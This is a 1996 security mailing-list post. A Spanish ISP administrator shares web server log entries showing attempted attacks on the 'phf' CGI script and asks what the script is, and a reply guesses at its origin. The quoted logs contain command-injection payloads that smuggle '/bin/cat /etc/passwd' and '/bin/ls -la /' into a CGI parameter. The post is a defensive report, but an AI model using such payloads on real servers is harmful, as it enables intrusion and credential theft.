[2961] in WWW Security List Archive
Re: 'phf' cgi-bin attack
daemon@ATHENA.MIT.EDU (Corie Hamer)
Tue Sep 17 15:30:42 1996
Date: Tue, 17 Sep 1996 10:26:53 -0700
To: =?iso-8859-1?Q?=22Jordi_=5C=22?= =?iso-8859-1?Q?Matem=E0tic=5C?=
" Salvat" <jordi@webarna.com>,
www-security@ns2.rutgers.edu
From: Corie Hamer <corie@angushamer.com>
Errors-To: owner-www-security@ns2.rutgers.edu
I don't know absolutely for sure what phf is, but my very first thought was
the CSO Nameserver which has a web "ph" interface. If you run Eudora Mail,
it utilizes the "ph" phone directory service. I used to be on the mailing
list but recently stopped since we are planning to go LDAP instead. You can
either do a search on CSO Nameserver, or go to University of Urbana=
Champaign.
Good Luck, Corie
At 10:20 PM 9/16/96 -0100, Jordi \"Matem=E0tic\" Salvat wrote:
>Many Spanish ISPs are receiving attack attempts on their WWW servers...
>they detect them on their log files in entries such as:
>
>info26.jet.es - - [04/Sep/1996:03:17:21 +0100] "GET
>/cgi-bin/phf?Qalias=3Dx%0a/bin/ls%20-la%20/ HTTP/1.0" 404 -
>infovia36_bcn.tinet.fut.es - - [04/Sep/1996:08:52:05 +0100] "GET
>/cgi-bin/phf?Qalias=3Dx%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 -
>ia245.arrakis.es - - [04/Sep/1996:14:45:35 +0100] "GET
>/cgi-bin/phf?Qalias=3Dx%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 -
>modem5.mrbit.es - - [09/Sep/1996:04:38:21 +0100] "GET
>/cgi-bin/phf?Qalias=3Dx%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 -
>modem5.mrbit.es - - [09/Sep/1996:06:15:21 +0100] "GET
>/cgi-bin/phf?Qalias=3Dx%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 -
>ppp03.las.es - - [12/Sep/1996:20:17:22 +0100] "GET
>/cgi-bin/phf?Qalias=3Dx%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 -
>
>Obviously attempting to get the passwd file.
>
>What is curious about these attacks is that they all come from different
>dial-up providers, from users apparently scattered throughout Spain.
>Maybe an "organized" group who meets and exchanges ideas over the I-net?
>There has also been a few attempts apparently comming from the US. Of
>course most providers have initiated action to find out who those
>cracker-apprentices are, and warn them that what they are doing is a
>delict under the new Spanish Penal Laws.
>
>At lease one of these attacks has been successful. The hacker then
>reportedly managed to find out root password (bad password choice?) and
>replaced the getty and getty to leave a 'backdoor'. The hacker was
>reportedly invisible to 'who' and 'last', so the only way to know
>whether he was logged in was to look at the process list.
>
>Does anyone know what this 'phf' cgi-bin is supposed to be?
>
>Thanks for your help.
>--=20
>Jordi Salvat i Alabart
> Web Edicions Barcelona
> edicions i consultoria Internet
> http://www.webarna.com
>
>
>
>
